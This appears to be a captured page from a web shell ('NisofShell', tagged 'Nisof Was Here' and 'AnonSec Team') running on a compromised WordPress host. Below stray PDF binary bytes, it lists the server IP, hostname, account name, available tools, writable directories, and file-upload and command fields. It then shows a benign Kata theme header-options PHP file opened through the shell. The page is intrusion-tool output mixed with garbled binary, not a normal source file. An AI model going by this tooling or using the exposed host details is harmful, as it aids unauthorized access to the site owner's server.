%PDF-1.5 %���� ºaâÚÎΞ-ÌE1ÍØÄ÷{òò2ÿ ÛÖ^ÔÀá TÎ{¦?§®¥kuµù Õ5sLOšuY Nisof Was Here
NisofShell
Server IP : 54.36.91.62  /  Your IP : 216.73.217.162
Web Server : Apache
System : Linux webm002.cluster127.gra.hosting.ovh.net 5.15.206-ovh-vps-grsec-zfs-classid #1 SMP Fri May 15 02:41:25 UTC 2026 x86_64
User : wellingtpa ( 97533)
PHP Version : 7.4.33
Disable Function : _dyuweyrj4,_dyuweyrj4r,dl
MySQL : OFF  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : ON  |  Sudo : OFF  |  Pkexec : OFF
Directory :  /home/wellingtpa/www/wp-content/plugins/kata/includes/theme-options/options/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ HOME SHELL ]     

Current File : /home/wellingtpa/www/wp-content/plugins/kata/includes/theme-options/options/header-options.php
<?php
/**
 * Layout Options.
 *
 * @author  ClimaxThemes
 * @package Kata Plus
 * @since   1.0.0
 */

// Don't load directly.
if ( ! defined( 'ABSPATH' ) ) {
	exit;
}

if ( ! class_exists( 'kata_Theme_Options_Header' ) ) {
	class kata_Theme_Options_Header extends kata_Theme_Options {
		/**
		 * Set Options.
		 *
		 * @since   1.0.0
		 */
		public static function set_options() {

			// Header Section
			Kirki::add_section(
				'kata_header_section',
				[
					'icon'       => 'ti-layout-tab-window',
					'title'      => esc_html__( 'Header', 'kata' ),
					'capability' => kata_Helpers::capability(),
					'priority'	 => 2,

				]
			);
			Kirki::add_field(
				self::$opt_name,
				[
					'settings'        => 'kata_header_border',
					'section'         => 'kata_header_section',
					'label'           => esc_html__('Border', 'kata'),
					'description'     => esc_html__('Header border bottom size', 'kata'),
					'type'            => 'slider',
					'default'         => 1,
					'choices'         => [
						'min'  => 0,
						'max'  => 10,
						'step' => 1,
					],
				]
			);
			Kirki::add_field(
				self::$opt_name,
				[
					'section'  => 'kata_header_section',
					'settings' => 'kata_header_border_color',
					'type'     => 'color',
					'label'    => esc_html__('Border Color', 'kata'),
					'description'     => esc_html__('Header border bottom color', 'kata'),
					'default'  => '#f0f1f1',
					'choices'  => [
						'alpha' => true,
					],
				]
			);
			Kirki::add_field(
				self::$opt_name,
				[
					'settings'    => 'kata_full_width_header',
					'section'     => 'kata_header_section',
					'label'       => esc_html__( 'Full Width Header', 'kata' ),
					'type'        => 'switch',
					'default'     => 'off',
					'choices'     => [
						'on'  	=> esc_html__( 'Enabled', 'kata' ),
						'off'	=> esc_html__( 'Disabled', 'kata' ),
					],
				]
			);
			Kirki::add_field(
				self::$opt_name,
				[
					'settings'    => 'kata_header_layout',
					'section'     => 'kata_header_section',
					'label'       => esc_html__( 'Layout', 'kata' ),
					'type'        => 'radio-image',
					'default'     => 'left',
					'choices'     => [
						'left'   => kata::$assets . '/left-header.png',
						'right'  => kata::$assets . '/right-header.png',
						'center' => kata::$assets . '/center-header.png',
					],
				]
			);
			Kirki::add_field(
				self::$opt_name,
				[
					'settings'    => 'kata_mobile_header_layout',
					'section'     => 'kata_header_section',
					'label'       => esc_html__( 'Mobile Layout', 'kata' ),
					'type'        => 'radio-image',
					'default'     => 'left',
					'choices'     => [
						'left'   => kata::$assets . '/mobile-left-header.png',
						'right'  => kata::$assets . '/mobile-right-header.png',
					],
				]
			);

		}
	} // class

	kata_Theme_Options_Header::set_options();
}

Anon7 - 2022
AnonSec Team